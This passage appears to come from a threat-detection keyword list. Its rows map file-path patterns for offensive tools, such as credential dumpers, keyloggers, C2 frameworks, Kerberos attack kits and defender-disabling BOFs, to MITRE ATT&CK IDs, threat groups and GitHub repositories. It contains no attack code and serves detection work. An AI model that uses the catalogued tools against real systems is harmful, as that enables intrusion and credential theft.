- T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*/KDStab.*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*/KDStab/*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*/keepass_discover_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/KeeThief.git*,offensive_tool_keyword,KeeThiefSyscalls,Patch GhostPack/KeeThief for it to use DInvoke and syscalls,T1003.001 - T1558.002,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/Metro-Holografix/KeeThiefSyscalls,1,1,private github repo,10,,N/A,,, -*/kerberoast.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/kerberoast.c*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/kerberoast.c*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*/kerberoast.h*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/kerberoast.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/kerberoast/*.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/kerberoast_hashes_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/kerberos.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/kerberos-ldap-password-hunter*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/oldboy21/LDAP-Password-Hunter,1,1,N/A,10,2,189,27,2023-01-06T15:32:34Z,2021-07-26T14:27:01Z -*/kerberosticket.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*/kerbrute/*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*/KernelMii.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tijme/kernel-mii,1,1,N/A,10,10,72,27,2023-05-07T18:38:29Z,2022-06-25T11:13:45Z -*/keygen.exe*,greyware_tool_keyword,_,generic suspicious keyword keygen.exe observed in multiple cracked software often packed with malwares,T1204 - T1027 - T1059 - T1055 - T1060 - T1195,TA0005 - TA0002 - TA0011,N/A,N/A,Phishing,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/keylogger.cpp*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213,TA0006 - TA0009,N/A,N/A,Collection - Credential Access - Exfiltration,https://github.com/trustedsec/SliverKeylogger,1,1,N/A,N/A,2,126,37,2023-09-22T19:39:04Z,2022-06-17T19:32:53Z -*/KeyLogger.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/keylogger.exe*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213,TA0006 - TA0009,N/A,N/A,Collection - Credential Access - Exfiltration,https://github.com/trustedsec/SliverKeylogger,1,1,N/A,N/A,2,126,37,2023-09-22T19:39:04Z,2022-06-17T19:32:53Z -*/keylogger/*.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/keyscan.go*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/killav.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/killav.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/KillDefenderBOF*,offensive_tool_keyword,KillDefenderBOF,KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender,T1055.002 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Cerbersec/KillDefenderBOF,1,1,N/A,10,3,200,29,2022-04-12T17:45:50Z,2022-02-06T21:59:03Z -*/kimi.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/kismet*,offensive_tool_keyword,kismet,Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.,T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/kismetwireless/kismet,1,0,N/A,N/A,10,1297,272,2023-09-29T14:28:16Z,2016-09-20T13:26:00Z -*/kismetwireless/*,offensive_tool_keyword,kismet,Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.,T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/kismetwireless/kismet,1,1,N/A,N/A,10,1297,272,2023-09-29T14:28:16Z,2016-09-20T13:26:00Z -*/kitrap0d.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/kittens/haloKitten*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/kittens/recycleKitten*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/KittyStager/*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/kiwi.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/kiwi_passwords.yar*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/klezVirus/CandyPotato*,offensive_tool_keyword,CandyPotato,CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking,T1547.004,TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/CandyPotato,1,1,N/A,N/A,3,289,67,2021-09-16T17:08:52Z,2020-08-21T17:14:30Z -*/knqyf263/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/knqyf263/CVE-2022-0847,1,1,N/A,N/A,1,46,9,2022-03-08T13:54:08Z,2022-03-08T13:48:55Z -*/knx-gateway-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/knx-gateway-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Koadic*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1059.005 - T1059.007 - T1021 - T1547.001 - T1055 - T1012,TA0002 - TA0005 - TA0007 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/zerosum0x0/koadic,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*/koadic.git*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/Koh/*.cs*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,1,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*/KrakenMask.git*,offensive_tool_keyword,KrakenMask,A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.,T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/RtlDallas/KrakenMask,1,1,N/A,9,2,144,28,2023-08-08T15:21:28Z,2023-08-05T19:24:36Z -*/krb5/*.py,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/krb5-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/krbjack.git*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,1,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -*/KrbRelay*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*/krbrelayx*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,1,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*/KRBUACBypass*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,1,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*/kronos.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/kubesploit.git*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - 